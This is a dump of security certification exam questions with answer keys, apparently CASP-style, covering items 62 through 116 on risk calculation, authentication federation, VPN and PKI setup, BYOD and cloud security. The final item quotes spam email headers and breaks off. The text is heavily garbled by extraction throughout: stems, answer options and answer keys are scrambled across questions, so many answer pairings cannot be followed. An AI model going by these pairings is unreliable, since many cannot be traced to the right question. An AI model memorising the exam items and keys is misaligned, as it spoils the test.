The administrator plans to hire a contractor at a rate of $100/hour to do the installation. Deploy a web based gateway antivirus server to intercept viruses before they enter the network. Which of the following would be the FIRST process to perform as a result of these findings? . D. 5. and is not being detected by the corporate antivirus. -45 percent B. C. the malware is delivered via drive-by downloads.Correct Answer: B Section: Research and Analysis Explanation Explanation/Reference: QUESTION 62 A security administrator notices a recent increase in workstations becoming compromised by malware. As part of running a pilot exercise. 82 percent Correct Answer: D Section: Research and Analysis Explanation Explanation/Reference: QUESTION 64 A new internal network segmentation solution will be implemented into the enterprise that consists of 200 internal firewalls. Often. Increase the frequency of antivirus downloads and install updates to all workstations. The equipment costs $50.000 on the first year. Deploy a WAF to inspect and block all web traffic which may contain malware and exploits. Correct Answer: B Section: Research and Analysis Explanation Explanation/Reference: QUESTION 63 A security administrator wants to calculate the ROI of a security design which includes the purchase of new equipment. Which of the following solutions would provide the BEST protection for the company? A.5 percent C. Given that the new design and equipment will allow the company to increase revenue and make an additional $100. it was determined that it takes three changes to deploy a new application onto the network before it is operational. from malware hosting websites.000 and it will take 50 hours to install and configure the equipment. B. Deploy a cloud-based content filter and enable the appropriate category to prevent further infections. which of the following is the ROI expressed as a percentage for the first year? A. Security now has a significant effect on overall availability. 45 percent D.

Correct Answer: D Section: Research and Analysis Explanation Explanation/Reference: QUESTION 66 The Information Security Officer (ISO) is reviewing a summary of the findings from the last COOP tabletop exercise. Perform a cost benefit analysis and implement the solution as it stands as long as the risks are understood by the business owners around the availability issues. D. D. C. A third party auditor reported findings against the business because some systems were missing patches. Engage internal auditors to perform a review of the project to determine why and how the project did not meet the security requirements. The business recently funded a patch management product and SOE hardening initiative. As part of the review ask them to review the control effectiveness. Which of the following BEST describes the scenario presented and the document the ISO is reviewing? A. The Chief Information Officer (CIO) wants to determine which additional controls must be implemented to reduce the risk of an extended customer service outage due to the VoIP system being unavailable. The audit findings are invalid because remedial steps have already been applied to patch servers and the remediation takes time to complete. Security controls are generally never 100% effective and gaps should be explained to stakeholders and managed accordingly. C. B.A. Correct Answer: D Section: Research and Analysis Explanation Explanation/Reference: QUESTION 65 A Chief Financial Officer (CFO) has raised concerns with the Chief Information Security Officer (CISO) because money has been spent on IT security infrastructure. B. D. The CFO is at fault because they are responsible for patching the systems and have already been given patch management and SOE hardening products. The ISO is assessing the effect of a simulated downtime involving the telecommunication system within the AAR. Lower the SLA to a more tolerable level and perform a risk assessment to see if the solution could be met by another solution. The ISO is calculating the budget adjustment needed to ensure audio/video system redundancy within the RFQ. Determine if the requirements can be met with a simpler solution. The CISO has not selected the correct controls and the audit findings should be assigned to them instead of the CFO. The ISO is evaluating the business implications of a recent telephone system failure within the BIA. Reuse the firewall infrastructure on other projects. Which of the following statements BEST describes this situation? A. Correct Answer: D Section: Research and Analysis Explanation . Decrease the current SLA expectations to match the new solution. Review to determine if control effectiveness is in line with the complexity of the solution. B. C. but corporate assets are still found to be vulnerable. The ISO is investigating the impact of a possible downtime of the messaging system within the RA.

the goal is to provide them with more self service functionality. Which of the following security activities should be implemented as part of the SDL in order to provide the MOST security coverage over the solution? (Select TWO). Which of the following problems would MOST likely be uncovered by this tool? A. Perform code review over a sampling of the front end source code C. Perform black box penetration testing over the solution D.Explanation/Reference: QUESTION 67 Which of the following activities is commonly deemed "OUT OF SCOPE" when undertaking a penetration test? A. The tool could enumerate backend SQL database table and column names C. A. Perform grey box penetration testing over the solution E. Perform static code review over the front end source code Correct Answer: DE Section: Research and Analysis Explanation Explanation/Reference: QUESTION 69 A new web based application has been developed and deployed in production. Test password complexity of all login fields and input validation of form fields B. Reverse engineering any thick client software that has been provided for the test C. Attempting to perform blind SQL injection and reflected cross-site scripting attacks E. The tool could show that input validation was only enabled on the client side B. Running a vulnerability scanning tool to assess network and host weaknesses Correct Answer: C Section: Research and Analysis Explanation Explanation/Reference: QUESTION 68 A company is in the process of implementing a new front end user interface for its customers. Perform unit testing of the binary code B. The tool could force HTTP methods such as DELETE that the server has denied . Undertaking network-based denial of service attacks in production environment D. A security engineer decides to use an HTTP interceptor for testing the application. The application has been written by developers over the last six months and the project is currently in the test phase.

D. This information can be found by querying the network's DNS servers. HTTP intercept D. Where would the consultant find this information and why would it be valuable? A. B. This information can be found in global routing tables. RAS B. and is valuable because backup connections typically do not require VPN access to the network. which of the following can the network administrator use to detect the presence of a malicious actor physically accessing the company's network or information systems from within? (Select TWO). Protocol analyzer Correct Answer: DF Section: Research and Analysis Explanation Explanation/Reference: . The tool could fuzz the application to determine where memory leaks occur Correct Answer: A Section: Research and Analysis Explanation Explanation/Reference: QUESTION 70 A security consultant is conducting a network assessment and wishes to discover any legacy backup Internet connections the network may have. This information can be found by accessing telecom billing records. Port scanner F. HIDS E. In addition to the company's physical security. A. Vulnerability scanner C. and is valuable because backup connections typically have much lower latency than primary connections. Correct Answer: A Section: Research and Analysis Explanation Explanation/Reference: QUESTION 71 A network administrator with a company's NSP has received a CERT alert for targeted adversarial behavior at the company. This information can be found by calling the regional Internet registry. and is valuable because backup DNS servers typically allow recursive queries from Internet hosts. D. C. and is valuable because backup connections typically do not have perimeter protection as strong as the primary connection.

internal training. Host based heuristic IPS. running as local admin. with direct control of the perimeter firewall ACLs. Interview employees and managers to discover the industry hot topics and trends C. attend training. The network team has ensured that Layer 2 and Layer 3 connectivity are working. Behavior based IPS with a communication link to a cloud based vulnerability and threat feed. as well as deployment of VDI for all client computing needs. NESSUS C.QUESTION 72 The security engineer receives an incident ticket from the helpdesk stating that DNS lookup requests are no longer working from the office. with split staff/guest wireless functionality. webinars. D. This division will require personnel to have high technology skills and industry certifications. Which of the following is the BEST method for this manager to gain insight into this industry to execute the task? A. and training to remain current with the industry and job requirements Correct Answer: D Section: Research and Analysis Explanation Explanation/Reference: QUESTION 74 The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. Attend meetings with staff. NMAP Correct Answer: D Section: Research and Analysis Explanation Explanation/Reference: QUESTION 73 A human resources manager at a software development company has been tasked with recruiting personnel for a new cyber defense division in the company. with push technology for definition updates. and become certified in software management D. Attend conferences. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. B. Which of the following tools would a security engineer use to make sure the DNS server is listening on port 53? A. segregated on a management VLAN. Implementation of an offsite data center hosting all company data. Interview candidates. Correct Answer: D Section: Research and Analysis . Cloud-based antivirus solution. NSLOOKUP D. The network is mostly flat. PING B. and hire a staffing company that specializes in technology jobs B. Which of the following equipment MUST be deployed to guard against unknown threats? A. C.

Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic. 3. Conduct an internal audit against industry best practices to perform a qualitative analysis. Various security requirements were also documented. C. various stakeholder requirements were gathered and decomposed to an implementable and testable level. Which of the following is the MOST appropriate action that the company should take to provide a more appropriate solution? .Explanation Explanation/Reference: QUESTION 75 A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture quickly with regard to targeted attacks. Requirement 5: The system shall perform CRC checks on all files. Level 2: Requirements 2 and 3 under 1. A network scan showed that this remote access application had already been installed on one third of the servers in the company. who required remote access. Level 1: Requirements 1 and 4. Requirement 2: The system shall use SSL. and 3. had deployed an unauthorized remote access application that communicated over common ports already allowed through the firewall. A. Survey threat feeds from services inside the same industry. Level 3: Requirement 3 under 2 D. Level 1: Requirements 1 and 4. SSH. Organize the following security requirements into the correct hierarchy required for an SRTM. Level 2: Requirements 4 and 5 Correct Answer: B Section: Integration of Computing. or SCP for all data transport. Requirement 5 under 4. Communications and Business Disciplines Explanation Explanation/Reference: QUESTION 77 During a recent audit of servers. 2. Which of the following should the CSO conduct FIRST? A. Requirement 4: The system shall provide integrity for all data at rest. D. and 5 B. Requirement 3: The system shall implement a file-level encryption scheme. Deploy a UTM solution that receives frequent updates from a trusted industry vendor. As part of the design of the project. Level 1: Requirements 1 and 4. Requirement 1: The system shall provide confidentiality for data in transit and data at rest. a company discovered that a network administrator. Level 2: Requirements 2. Level 1: Requirements 1. Requirement 5 under C. B. Correct Answer: A Section: Research and Analysis Explanation Explanation/Reference: QUESTION 76 A security engineer is working on a large software development project. Level 2: Requirement 2 under 1.

C. Employees working the assembly line cannot be bothered with additional steps or overhead. -Manufacturing is asking for ease of use. Implement SSL VPN with SAML standards for federation D. It has extensive ACL functionality. Implement an ACL on the firewall with NAT for remote access Correct Answer: C Section: Integration of Computing. Communications and Business Disciplines Explanation Explanation/Reference: QUESTION 79 Executive management is asking for a new manufacturing control and workflow automation solution. The favored solution is a user friendly software application that would be hosted onsite. -Legal is asking for adequate safeguards to protect trade secrets. Implement an IPS to block the application on the network B. which provides voice connectivity for store VoIP phones. Deploy new perimeter firewalls at all stores with UTM functionality. Change antivirus vendors at the store and the corporate office. stores are reporting poor response times when accessing the POS application from store computers as well as degraded voice quality when making phone calls. the information security department is asked to review the configuration and suggest changes to prevent this from happening again. Move to a VDI solution that runs offsite from the same data center that hosts the new POS solution. Upon investigation. An additional split-tunnel VPN provides bi-directional connectivity back to the main office. After malware removal. -Sales is asking for easy order tracking to facilitate feedback to customers. it is determined that three store PCs are hosting malware. Communications and Business Disciplines Explanation Explanation/Reference: QUESTION 78 A small retail company recently deployed a new point of sale (POS) system to all 67 stores. and data encryption. -Quality assurance is concerned about managing the end product and tracking overall performance of the product being produced.based SaaS application. accessible only from retail stores and the corporate office over a split-tunnel VPN. This application will facilitate management of proprietary information and closely guarded corporate trade secrets. a cloud. which is generating excessive network traffic. Implement the remote application out to the rest of the servers C. Recently. as well as employee wireless. . kiosk automation. D. Which of the following denotes the BEST way to mitigate future malware risk? A. Deploy a proxy server with content filtering at the corporate office and route all traffic through it. The core of the POS is an extranet site. Each store offers guest wireless functionality. B. System interaction needs to be quick and easy. They would like automated data interchange with the employee management application. but also has readily available APIs for extensibility. Only the staff wireless network has access to the POS VPN. The information security team has been a part of the department meetings and come away with the following notes: -Human resources would like complete access to employee data stored in the application. It supports read-only access.A. They would like read- only access to the entire workflow process for monitoring and baselining. They are also concerned with data ownership questions and legal jurisdiction. Correct Answer: A Section: Integration of Computing. custom fields.

Web cameras B. a highly sensitive area. BYOD E. A. Presence Correct Answer: CE Section: Integration of Computing. Sales D. the intruder circumvented numerous layers of physical and electronic security measures. which of the following tools should the helpdesk manager use to make the staff more effective at troubleshooting while at the same time reducing company costs? (Select TWO). Manufacturing B. Communications and Business Disciplines Explanation Explanation/Reference: QUESTION 80 The helpdesk manager wants to find a solution that will enable the helpdesk staff to better serve company employees who call with computer-related problems. Programming E. Human resources C. Data center operations . To gain access. Given that the helpdesk staff is located within the company headquarters and 90% of the callers are telecommuters.Which of the following departments' request is in contrast to the favored solution? A. Legal C. Desktop sharing F. Company leadership has asked for a thorough review of physical security controls to prevent this from happening again. Research and development D. Instant messaging D. Human resources Correct Answer: E Section: Integration of Computing. Quality assurance E. Which of the following departments are the MOST heavily invested in rectifying the problem? (Select THREE). A. The helpdesk staff is currently unable to perform effective troubleshooting and relies on callers to describe their technology problems. Communications and Business Disciplines Explanation Explanation/Reference: QUESTION 81 An intruder was recently discovered inside the data center. Facilities management B. Email C.

Hire an independent security consulting agency to perform a penetration test of the web servers. Attempt to exploit via the proof-of-concept code. Consult the company's legal department on practices and law C. A security advisor within a company has been asked to provide recommendations on how to respond quickly to these vulnerabilities. D. Proof-of. Contact senior finance management and provide background information D. The sales manager has reviewed the sales goals for the upcoming year and identified an increased target across the software products that will be affected by the financial department's change. likelihood of exploitability. Seek industry outreach for software practices and law Correct Answer: B Section: Integration of Computing. All software products will continue to go through new development in the coming year. Which of the following should the sales manager do to ensure the company stays out of trouble? A. Claims have been made that all common web-based development frameworks are susceptible to attack. Review vulnerability write-ups posted on the Internet.concept details have emerged on the Internet. Assess the reliability of the information source. B. Communications and Business Disciplines Explanation Explanation/Reference: QUESTION 82 A completely new class of web-based vulnerabilities has been discovered. Notify all customers about the threat to their hosted data. Respond to management with a recommendation to wait until the news has been independently verified by software vendors providing the web application software. Consider remediation options. and impact to hosted data. Which of the following BEST describes how the security advisor should respond? A. Communications and Business Disciplines Explanation Explanation/Reference: QUESTION 83 A company sales manager received a memo from the company's financial department which stated that the company would not be putting its software products through the same security testing as previous years to reduce the research and development cost by 20 percent for the upcoming year.F. The memo also stated that the marketing material and service level agreement for each product would remain unchanged. Information technology Correct Answer: AEG Section: Integration of Computing. C. Communications and Business Disciplines Explanation . Correct Answer: A Section: Integration of Computing. Discuss the issue with the software product's user groups B. Marketing G. Advise management of any `high' or `critical' penetration test findings and put forward recommendations for mitigation. Bring the web servers down into "maintenance mode" until the vulnerability can be reliably mitigated through a vendor patch.

IT governance C. Workstations can undergo maintenance from 8:00 pm to 6:00 am daily. Quality of service . Transference of risk Correct Answer: B Section: Integration of Computing. B. Which of the following is being described? A. installation. and use of the middleware client on BYOD. A. Which of the following is the NEXT step that the security team should take? A." The company also issues a memorandum separate from the policy. C. Managed security service B. Purchase new hardware to keep the malware isolated. Which of the following can specify parameters for the maintenance work? (Select TWO). Change management D. Asset management B. "BYOD clients must meet the company's infrastructure requirements to permit a connection. Construct a series of VMs to host the malware environment. A total outage period of four hours is permitted for servers. Develop a policy to outline what will be required in the secure lab. The company-issued device has a managed middleware client that restricts the applications allowed on company devices and provides those that are approved. D. Communications and Business Disciplines Explanation Explanation/Reference: QUESTION 86 A security engineer on a large enterprise network needs to schedule maintenance within a fixed window of time. which provides instructions for the purchase.Explanation/Reference: QUESTION 84 A member of the software development team has requested advice from the security team to implement a new secure lab for testing malware. The middleware client provides configuration standardization for both company owned and BYOD to secure data and communication to the device according to industry best practices. Create a proposal and present it to management for approval. The policy states that. Correct Answer: D Section: Integration of Computing. Communications and Business Disciplines Explanation Explanation/Reference: QUESTION 85 A company has issued a new mobile device policy permitting BYOD and company-issued devices. Memorandum of understanding C.

A. Waterfall model D. Which of the following additional controls should be implemented to prevent data loss? (Select THREE). Monitor approved credit accounts E. Email forwarding is blocked and staff at the third party can only communicate with staff within the organization.D. Agile model Correct Answer: C Section: Integration of Computing. Data sovereignty and privacy concerns raised by the security team resulted in the third-party provider only accessing and processing the data via remote desktop sessions. Communications and Business Disciplines Explanation Explanation/Reference: QUESTION 87 An organization has decided to reduce labor costs by outsourcing back office processing of credit applications to a provider located in another country. Disable cross session cut and paste D. Implement hashing of data in transit B. To facilitate communications and improve productivity. Which of the following software development methods is MOST applicable? A. Operating level agreement Correct Answer: BE Section: Integration of Computing. Incremental model C. with each stage requiring an in-depth risk analysis before moving on to the next phase. Session recording and capture C. Communications and Business Disciplines Explanation Explanation/Reference: . The original collaboration solution has been in place for nine years. Network service provider E. and took over two years to develop originally. The SDLC has been broken up into eight primary stages. Source IP whitelisting Correct Answer: CEF Section: Integration of Computing. Communications and Business Disciplines Explanation Explanation/Reference: QUESTION 88 A company has received the contract to begin developing a new suite of software tools to replace an aging collaboration solution. Spiral model B. staff at the third party has been provided with corporate email accounts that are only accessible via the remote desktop sessions. contains over a million lines of code. User access audit reviews F.

system log gathering. Which of the following questions is the MOST important? A. What encryption standards are used in tracking database? D. Scrum D. The risk management team has been asked to review vendor responses to the RFQ. Force all SIP communication to be encrypted C. What snapshot or "undo" features are present in the application? E. Install IDS/IPS systems on the network B. inventory management. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. hardware logging. Communications and Business Disciplines Explanation Explanation/Reference: QUESTION 91 A software development manager is taking over an existing software development project. Spiral . What are the protections against MITM? B. and remote registry access. This tool should allow remote desktop sharing. Which of the following would be LEAST likely to thwart such an attack? A. The attacker uses a tool to flood the network with a large number of SIP INVITE traffic.QUESTION 89 An attacker attempts to create a DoS event against the VoIP system of a company. Communications and Business Disciplines Explanation Explanation/Reference: QUESTION 90 The helpdesk department desires to roll out a remote support application for internal use on all company computers. Which of the following development methodologies is the team MOST likely using now? A. What accountability is built into the remote support application? C. Implement QoS parameters on the switches Correct Answer: D Section: Integration of Computing. This gap is resulting in an above average number of security-related bugs making it into production. chat. Waterfall C. Create separate VLANs for voice and data traffic D. What encryption standards are used in remote desktop and file transfer functionality? Correct Answer: B Section: Integration of Computing. Agile B.

B. Communications and Business Disciplines Explanation Explanation/Reference: QUESTION 92 A security manager has received the following email from the Chief Financial Officer (CFO): "While I am concerned about the security of the proprietary financial data in our ERP application. C. D. Work with the executive management team to revise policies before allowing any remote access. Correct Answer: D Section: Integration of Computing. They are currently installing fiber-to-the-home in many areas with hopes of also providing . The three companies should implement federated authentication through Shibboleth connected to an LDAP backend and agree on a single SSID. we do not allow employees to work from home but this is something I am willing to allow so we can get back on track. The three companies should implement a central portal-based single sign-on and agree to use the same CA when issuing client certificates. we have had a lot of turnover in the accounting group and I am having a difficult time meeting our monthly performance targets. Allow terminal services access from personal computers after the CFO provides a list of the users working from home. All three companies should use the same wireless vendor to facilitate the use of a shared cloud based wireless controller. Which of the following should the three companies implement? A. What should we do first to securely enable this capability for my group?" Based on the information provided. Remote access to the ERP tool introduces additional security vulnerabilities and should not be allowed. B. which of the following would be the MOST appropriate response to the CFO? A. As things currently stand. Communications and Business Disciplines Explanation Explanation/Reference: QUESTION 93 Three companies want to allow their employees to seamlessly connect to each other's wireless corporate networks while keeping one consistent wireless client configuration. Correct Answer: A Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 94 Company XYZ provides cable television service to several regional areas. Each company wants to maintain its own authentication infrastructure and wants to ensure that an employee who is visiting the other two companies is authenticated by the home office when connecting to the other companies' wireless network. Allow VNC access to corporate desktops from personal computers for the users working from home.Correct Answer: B Section: Integration of Computing. The three companies should agree on a single SSID and configure a hierarchical RADIUS system which implements trust delegation.1x EAP-PEAP- MSCHAPv2 for client configuration. C. All three companies have agreed to standardize on 802. D.

Which of the following solutions is BEST suited for this scenario? A. Company A's security administrator should use an HTTPS capable browser to transfer the data. The board of directors wishes to keep the subsidiaries separate from the parent company. Secure storage and transmission of API keys B. with the parent becoming the IdP. C. The solution must use open standards. D. using company B's API in an automated manner. Additionally. Multi-tenancy with RBAC support . The telephone and Internet services portions of the company will each be separate subsidiaries of the parent company. with the parent becoming the IdP. Company A's policy prohibits the use of any intermediary external systems to transfer or store its sensitive data. At least two years retention of log files in case of e-discovery requests D. Which of the following will provide end-to-end encryption for the data transfer while adhering to these requirements? A. and/or discovery Which of the following are the BEST security considerations to protect data from one customer being disclosed to other customers? (Select THREE). and the subsidiaries becoming an IdP. D. and customer authentication. A. billing. with the parent becoming the SP. with the parent becoming the ASP. The companies should federate. and be simple and seamless for customers. and the subsidiaries becoming an SP. while only sharing minimal data between the companies. The companies should federate. insights. Correct Answer: C Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 95 Company A needs to export sensitive data from its financial system to company B's database. Secure protocols for transmission of log files and search results C. C. Correct Answer: A Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 96 A security company is developing a new cloud-based log analytics platform. Company A must install an SSL tunneling software on the financial system. B. and the subsidiaries becoming an SSP. and the subsidiaries becoming an IdP. company A's legacy financial software does not support encryption. therefore the transfer must occur directly between company A's financial system and company B's destination server using the supplied API. Its purpose is to allow: Customers to upload their log files to the "big data" platform Customers to perform remote log search Customers to integrate into the platform using an API so that third party business intelligence tools can be used for the purpose of trending. However all three companies must share customer data for the purposes of accounting. The companies should federate. Company A should use a dedicated MPLS circuit to transfer the sensitive data to company B. while company B's API supports encryption.telephone and Internet services. Company A and B must create a site-to-site IPSec VPN on their respective firewalls. B. The companies should federate.

Confidentiality E. Additionally. Man-in-the-middle attempts via a HTTP intercepting proxy are failing with SSL errors. Integrity D. SSL certificate revocation B. Which of the following security goals does this meet? (Select TWO). Mobile device root-kit detection D. Encryption of logical volumes on which the customers' log files reside Correct Answer: ABD Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 97 A penetration tester is assessing a mobile banking application. Encryption Correct Answer: BC Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 99 The risk manager is reviewing a report which identifies a requirement to keep a business critical legacy system operational for the next two years. Availability B. SSL certificate pinning C. The administrator deploys DNSSEC extensions to the domain names and infrastructure.E. A. Which of the following controls has likely been implemented by the developers? A. Authentication C. Extended Validation certificates Correct Answer: B Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 98 A system administrator needs to meet the maximum amount of security goals for a new DNS infrastructure. The legacy system is out of support because the vendor and security patches are no longer released. Sanitizing filters to prevent upload of sensitive log file contents F. this is a proprietary embedded system and little is documented and known .

The company is using Active Directory Federated Services for their directory service. Segment the device on its own secure network.party? (Select TWO). B. Correct Answer: B Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 100 An organization would like to allow employees to use their network username and password to access a third-party service. The company's custom code was not patched. A. Kerberos Correct Answer: BE Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 101 An extensible commercial software system was upgraded to the next minor release version to patch a security vulnerability. LDAP/S B. Which of the following should the Information Technology department implement to reduce the security risk from a compromise of this system? A. Hire developers to reduce vulnerabilities in the code. Install an antivirus and HIDS on the system. The software vendor is called in to troubleshoot the issue and reports that all core components were updated properly. The wrong version of the patch was used. The company's IDS signatures were not updated. The patch caused the system to revert to http. SAML C. Correct Answer: BF Section: Technical Integration of Enterprise Components . NTLM D. Third-party plug-ins were not patched. C. B. The software patch was not cryptographically signed. After the upgrade. Virtualize the system and migrate it to a cloud provider. C. D. Which of the following has been overlooked in securing the system? (Select TWO). A. OAUTH E. an unauthorized intrusion into the system was detected. D.about it. Which of the following should the company ensure is supported by the third. F. E.

Using a community cloud with adequate controls D. Outsourcing the service to a third party cloud provider Correct Answer: C Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 103 A company is deploying a new iSCSI-based SAN. IPSec using AH with PKI certificates for authentication C. they do not have the resources or the scalability to adequately serve their clients. A. and manufacturing. Shared keys must NOT be used. While the business is lucrative. education. Targets use CHAP authentication B. Initiators and targets use CHAP authentication E.Explanation Explanation/Reference: QUESTION 102 A forensic analyst works for an e-discovery firm where several gigabytes of data are processed daily. Do NOT use encryption in order to gain performance. Offload some data processing to a public cloud B. Which of the following design specifications meet all the requirements? (Select TWO). Targets have SCSI IDs for authentication Correct Answer: BD Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 104 Company XYZ provides hosting services for hundreds of companies across multiple industries including healthcare. which of the following scenarios should they consider? A. IPSec using AH with PSK authentication and 3DES G. The security architect . Aligning their client intake with the resources available C. The requirements are as follows: SAN nodes must authenticate each other. Fiber channel should be used with AES D. Fiber channel over Ethernet should be used F. Since it is an e-discovery firm where chain of custody is important.

C. and administrative complexity on the proposal. Move the web servers to an elastic public cloud while keeping the database servers local. ABC Company must now encrypt all WAN transmissions. Correct Answer: C Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 105 A university requires a significant increase in web and database server resources for one week. Which of the following BEST describes the core concerns of the security architect? A. twice a year. Correct Answer: D Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 106 Due to a new regulatory requirement. Deploy inline network encryption devices B. The security architect notes concerns about data separation. When speaking with the network administrator. D. C. Install an SSL acceleration appliance C. Virtualize the web servers locally to add capacity during registration. Company XYZ could be liable for disclosure of sensitive data from one hosted customer when accessed by a malicious user who has gained access to the virtual machine of another hosted customer. The web servers remain idle for the rest of the year. the security administrator learns that the existing routers have the minimum processing power to do the required level of encryption. Most of company XYZ's customers are willing to accept the risks of unauthorized disclosure and access to information by outside users. to handle student registration. Not all of company XYZ's customers require the same level of security and the administrative complexity of maintaining multiple security postures on a single hypervisor negates hardware cost savings. Add an encryption module to the router and configure IPSec Correct Answer: A . Require all core business applications to use encryption D. confidentiality. The availability requirements in SLAs with each hosted customer would have to be re-written to account for the transfer of virtual machines between physical platforms for regular maintenance. D. regulatory requirements concerning PII. Which of the following solutions minimizes the performance impact on the router? A. B. Move the database servers to an elastic private cloud while keeping the web servers local. Move the database servers and web servers to an elastic private cloud.for company XYZ is reviewing a vendor proposal to reduce company XYZ's hardware costs by combining multiple physical hosts through the use of virtualization technologies. Which of the following is the MOST cost effective way for the university to securely handle student registration? A. B.

The VPN concentrator's certificate private key must be installed on the VPN concentrator. A. wants to publish her newly developed software to an online store. Ann wants to ensure that the software will not be modified by a third party or . Enable time of day restrictions for personal devices. Encrypt data in transit for remote access. Which of the following security measures would be MOST effective in securing the enterprise under the new policy? (Select TWO). The VPN concentrator's certificate private key must be signed by the CA and installed on the VPN concentrator. The user certificate private key must be signed by the CA. It will allow access to email and remote connections to the corporate enterprise from personal devices. D. The CA's certificate private key must be installed on the VPN concentrator. B. Require smart card authentication for all devices. Implement NAC to limit insecure devices access. Correct Answer: BD Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 108 A security administrator is tasked with implementing two-factor authentication for the company VPN.Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 107 In order to reduce costs and improve employee satisfaction. The VPN is currently configured to authenticate VPN users against a backend RADIUS server. C. The CA's certificate public key must be installed on the VPN concentrator. Provide free email software for personal devices. E. E. A. Which of the following should the security administrator configure and implement on the VPN concentrator to implement the second factor and ensure that no error messages are displayed to the user during the VPN connection? (Select TWO). a software developer. a large corporation is creating a BYOD policy. F. B. New company policies require a second factor of authentication. Correct Answer: EF Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 109 Ann. and the Information Security Officer has selected PKI as the second factor. The user's certificate private key must be installed on the VPN concentrator. D. C. provided they are on an approved device list.

end users before being installed on mobile devices. How should the employees request access to shared resources before the authentication integration is complete? A. Secure code review Correct Answer: C Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 110 Two separate companies are in the process of integrating their authentication infrastructure into a unified single sign-on system.lastname together with their original password and the next 6-digit code displayed when the token button is depressed. They should use the username format: LAN\first.middle attack. Enforce TLS connections between RADIUS servers D.lastname@company. Disable unused EAP methods on each RADIUS server C. Use a shared secret for each pair of RADIUS servers Correct Answer: C Section: Technical Integration of Enterprise Components Explanation . C. They should logon to the system using the username concatenated with the 6-digit code and their original password.lastname#### where #### is the second factor code. Which of the following should Ann implement to stop modified copies of her software from running on mobile devices? A. They should logon to the system using the newly assigned global username: first. Remote attestation D. The system administrators have configured a trust relationship between the authentication backend to ensure proper process flow. Identity propagation C. Which of the following controls should be implemented to mitigate the attack in the future? A. Currently. They should use the username format: first. Use PAP for secondary authentication on each RADIUS server B. together with a password and their 6-digit code. both companies use an AD backend and two factor authentication using TOTP. D. Single sign-on B.com. The system consists of a web of trusted RADIUS servers communicating over the Internet. Correct Answer: D Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 111 An industry organization has implemented a system to allow trusted authentication between all of its partners. B. An attacker was able to set up a malicious server and conduct a successful man-in-the.

The company should use the method recommended by other respected information security organizations. The company should use a mixture of both systems to meet minimum standards. The infrastructure will pass the student's credentials back to the home school for authentication via the Internet. Different antivirus solutions between the host and guest OSs. The company should use the CEO's encryption scheme.11n wireless networks available to the other university's students.Explanation/Reference: QUESTION 112 Joe. He has designed a network defense method which he says is significantly better than prominent international standards. Which of the following methodologies should be adopted? A. He has recommended that the company use his cryptographic method. D. Correct Answer: A Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 114 Two universities are making their 802. Aggressive patch management on the host and guest OSs. Correct Answer: D Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 113 Which of the following BEST constitutes the basis for protecting VMs from attacks from other VMs hosted on the same physical platform? A. B. Unique Network Interface Card (NIC) assignment per guest OS. The company should develop an in-house solution and keep the algorithm a secret. The requirements are: Mutual authentication of clients and authentication server The design should not limit connection speeds Authentication must be delegated to the home school No passwords should be sent unencrypted The following design was implemented: WPA2 Enterprise using EAP-PEAP-MSCHAPv2 will be used for wireless security RADIUS proxy servers will be used to forward authentication requests to the home school The RADIUS servers will have certificates from a common public certificate authority . C. D. the Chief Executive Officer (CEO). was an Information security professor and a Subject Matter Expert for over 20 years. Host based IDS sensors on all guest OSs. B. C.

000 for the next three years responding to and eradicating workstation malware. 1 Nov 2010 11:15:24 -0700 (PDT) Received: by 10. Students should be given certificates to use for authentication to the network Correct Answer: A Section: Technical Integration of Enterprise Components Explanation Explanation/Reference: QUESTION 115 A company with 2000 workstations is considering purchasing a HIPS to minimize the impact of a system compromise from malware.14. The transport layer between the RADIUS servers should be secured B. an annual cost of $5 per workstation. an annual cost of $8 per workstation.000 one-time fee.120. annual cost of $6 per workstation.231. The third quote has no one-time fee. The first quote requires a $10. The second quote requires a $15. The RADIUS servers should have local accounts for the visiting students D.com> Received: from 127.com>. the company projects a total cost of $50. First quote B.0. Second quote C.0. Accept the risk Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 116 Customers are receiving emails containing a link to malicious software. 01 Nov 2010 11:15:23 -0700 (PDT) Return-Path: <IT@company.1 for <customer@example. 1 Nov 2010 13:15:14 -0500 (envelope-from <IT@company.com Received: by 10. and a 10% annual support fee based on the number of workstations. The Information Security Officer (ISO) has received three quotes from different companies that provide HIPS.193 Mon. Currently.205 Mon. Mon. The email reads as follows: Delivered-To: customer@example. WPA Enterprise should be used to decrease the network overhead C.com>) . These emails are subverting spam filters. Third quote D.A strong shared secret will be used for RADIUS server authentication Which of the following security considerations should be added to the design? A.31. and a 12% annual fee based on the number of workstations. and a 15% annual fee based on the number of workstations. Which solution should the company select if the contract is only valid for three years? A.000 one-time fee.

